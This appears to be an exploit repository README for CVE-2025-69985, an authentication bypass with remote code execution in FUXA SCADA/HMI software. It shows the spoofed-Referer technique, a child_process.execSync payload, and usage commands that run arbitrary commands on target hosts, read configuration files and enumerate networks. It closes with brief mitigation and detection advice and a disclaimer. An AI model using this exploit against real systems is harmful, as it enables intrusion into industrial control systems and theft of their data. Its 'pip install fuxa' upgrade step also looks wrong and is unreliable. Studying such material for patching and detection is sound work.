Share
## https://sploitus.com/exploit?id=36B09711-9C64-5523-AE62-87CB12AF58B3
# CVE-2025-69985: FUXA โค 1.2.8 Authentication Bypass + RCE Exploit
[](https://nvd.nist.gov/vuln/detail/CVE-2025-69985)
[](https://www.python.org/)
[](https://www.gnu.org/licenses/gpl-3.0.en.html)
> **WARNING**: This is a proof-of-concept exploit for **authorized security testing only**. Do not use against systems you do not own or have explicit permission to test.
## Description
**CVE-2025-69985** is a critical authentication bypass vulnerability in [FUXA](https://github.com/frangoteam/FUXA) (open-source web-based SCADA/HMI software) affecting versions โค 1.2.8.
The vulnerability exists in `server/api/jwt-helper.js` middleware, which improperly trusts the HTTP `Referer` header to validate internal requests. An attacker can bypass JWT authentication by spoofing the `Referer` header, gaining access to the protected `/api/runscript` endpoint to execute arbitrary Node.js code.
### Technical Details
| Attribute | Value |
|-----------|-------|
| **CVE ID** | CVE-2025-69985 |
| **CVSS Score** | 9.8 (Critical) |
| **Affected Versions** | FUXA โค 1.2.8 |
| **Attack Vector** | Network (unauthenticated) |
| **Impact** | Remote Code Execution (RCE) |
| **Root Cause** | Improper authentication via Referer header trust |
| **Patched Version** | > 1.2.8 |
## Start
### Prerequisites
- Python 3.7+
- `requests` library (`pip install requests`)
- Docker (for vulnerable test environment)
### Installation
```bash
# Clone the repository
git clone https://github.com/ladybugsaga/CVE-2025-69985-FUXA-Exploit.git
cd CVE-2025-69985-FUXA-Exploit
# Install dependencies
pip install requests
```
## Testing the Vulnerability
### Step 1: Deploy Vulnerable Environment
Use Docker to deploy a vulnerable FUXA instance for safe testing:
```bash
# Deploy FUXA v1.2.0 (vulnerable)
docker run -d \
--name fuxa-vuln \
-p 1881:1881 \
frangoteam/fuxa:1.2.0
# Wait for container to initialize
sleep 10
# Verify FUXA is accessible
curl http://localhost:1881/
```
### Step 2: Run the Exploit
```bash
# Basic command execution
python3 exploit.py -u http://localhost:1881 -c "whoami"
# Get system information
python3 exploit.py -u http://localhost:1881 -c "id"
python3 exploit.py -u http://localhost:1881 -c "uname -a"
python3 exploit.py -u http://localhost:1881 -c "cat /etc/os-release"
# List files in working directory
python3 exploit.py -u http://localhost:1881 -c "ls -la"
```
### Expected Output
```
[*] Target : http://localhost:1881
[*] Command: whoami
[*] Preparing payload โ executing: whoami
[*] Sending exploit request to /api/runscript ...
[*] Response status: 200
[+] Command executed successfully (CVE-2025-69985 bypass)!
=== COMMAND OUTPUT ===
"root"
======================
================================================================
Exploit completed!.
================================================================
```
## Usage
```bash
python3 exploit.py -u -c
```
### Arguments
| Option | Required | Description |
|--------|----------|-------------|
| `-u, --url` | Yes | Target URL (e.g., `http://target:1881`) |
| `-c, --cmd` | Yes | Command to execute on target |
### Examples
```bash
# Single command execution
python3 exploit.py -u http://192.168.1.100:1881 -c "ls -la /"
# Extract FUXA configuration
python3 exploit.py -u http://target:1881 -c "cat /usr/src/app/FUXA/server/_db/projects.json"
# Network enumeration
python3 exploit.py -u http://target:1881 -c "cat /proc/net/arp"
python3 exploit.py -u http://target:1881 -c "ip addr show"
```
## How It Works
### Attack Flow
```
Attacker โ POST /api/runscript
โ
Referer: http://target:1881/fuxa โ Spoofed header bypasses JWT
โ
Body: {"script": {"code": "require('child_process').execSync('command')"}}
โ
Server โ Executes Node.js code via child_process.execSync()
โ
Response: Command output returned in HTTP response
```
### Vulnerable Code Path
```javascript
// server/api/jwt-helper.js (vulnerable)
if (req.headers.referer && req.headers.referer.includes(req.headers.host)) {
// Trusts Referer header as "internal" request
return next(); // Bypasses JWT validation
}
```
The exploit crafts a multipart request with:
1. **Spoofed `Referer` header** matching the target's host
2. **Malicious JavaScript payload** using `child_process.execSync()`
3. **`/api/runscript` endpoint** which executes the code with server privileges
## Mitigation
### Upgrade
```bash
# Update to patched version
pip install fuxa>1.2.8
# OR
docker pull frangoteam/fuxa:latest
```
### Workarounds
If immediate patching is not possible:
1. **Network Segmentation**: Restrict FUXA access to internal networks only
2. **Reverse Proxy**: Add authentication layer before FUXA
3. **WAF Rules**: Block requests with suspicious Referer headers to `/api/runscript`
### Detection
Monitor for:
- Unexpected `Referer` headers in API requests
- POST requests to `/api/runscript` endpoint
- Child process execution from Node.js runtime
## References
- [CVE-2025-69985 - NVD](https://nvd.nist.gov/vuln/detail/CVE-2025-69985)
- [GitHub Advisory GHSA-4r4r-4jp4-wwf9](https://github.com/advisories/GHSA-4r4r-4jp4-wwf9)
- [FUXA Project](https://github.com/frangoteam/FUXA)
- [Exploit-DB 52544](https://www.exploit-db.com/exploits/52544)
## Disclaimer
This tool is provided for **educational and authorized security testing purposes only**. The author assumes no liability for misuse of this code.
- **DO NOT** use against systems you do not own
- **DO NOT** use without explicit written permission
- **DO NOT** use for malicious purposes
Unauthorized access to computer systems is illegal under:
- Computer Fraud and Abuse Act (CFAA) - USA
- Computer Misuse Act 1990 - UK
- Similar legislation in other jurisdictions
## License
GNU General Public License v3.0 (GPL-3.0)
Copyright (c) 2026
This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
## Credits
- **Original Exploit Author**: Joshua van der Poll ([@joshuavanderpoll](https://github.com/joshuavanderpoll/))
- **Vulnerability Discovery**: FUXA Security Team / Community
- **CVE Assignment**: MITRE Corporation
---
**Repository**: https://github.com/ladybugsaga/CVE-2025-69985-FUXA-Exploit
**Issues**: https://github.com/ladybugsaga/CVE-2025-69985-FUXA-Exploit/issues